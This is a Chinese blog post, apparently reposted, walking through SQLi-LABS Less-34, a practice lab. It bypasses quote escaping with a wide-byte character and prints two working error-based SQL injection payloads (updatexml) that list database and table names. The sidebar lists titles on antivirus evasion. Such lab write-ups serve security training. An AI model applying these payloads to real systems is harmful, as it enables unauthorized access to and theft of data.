搜索
SQLi LABS Less-34
统计
  • 建站日期:2015-11-11
  • 文章总数:2410 篇
  • 评论总数:0 条
  • 分类总数:38 个
  • 最后更新:2022年07月24日

SQLi LABS Less-34

纸飞机-JAVA追梦 / / 0 评论 / 124 阅读 /0 赞
作者有点忙,还没写简介
本文阅读 1 分钟
首页 安全分享,WEB安全 正文

第三十四关注入点为 单引号字符串型 , 注入类型为 报错注入

此关卡通过 代码WAF 将单引号' 转义成 /' , 我们使用 编译 绕过WAF , 先上结果

�' and updatexml(1,concat(0x7e,
substr((select group_concat(schema_name)
from information_schema.schemata),62,31)
),3) #

img

 

�' and updatexml(1,concat(0x7e,
substr((select group_concat(table_name)
from information_schema.tables
where table_schema=0x7365637572697479),1,31)
),3) #

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/118311817
-- 展开阅读全文 --
Redis底层数据结构--跳跃表
« 上一篇 04-28
BUUCTF Web [强网杯 2019]随便注
下一篇 » 06-24

相关推荐

BUUCTF Web [强网杯 2019]随便注

Web安全—逻辑越权漏洞(BAC)

最新Easy RCE using Docker API 复现

发表评论

成为第一个评论的人

热门文章

1
Go语言实现MSF免杀上线、思路可转换自己生成马进行绕过免杀!
1.3k 阅读 ,
2
免杀 编译shellcode进行绕过杀软操作!
1.1k 阅读 ,
3
远控免杀系列文章与工具
1k 阅读 ,
4
WEBSEC-信息收集--第一篇
920 阅读 ,

标签TAG

最近回复

我要留言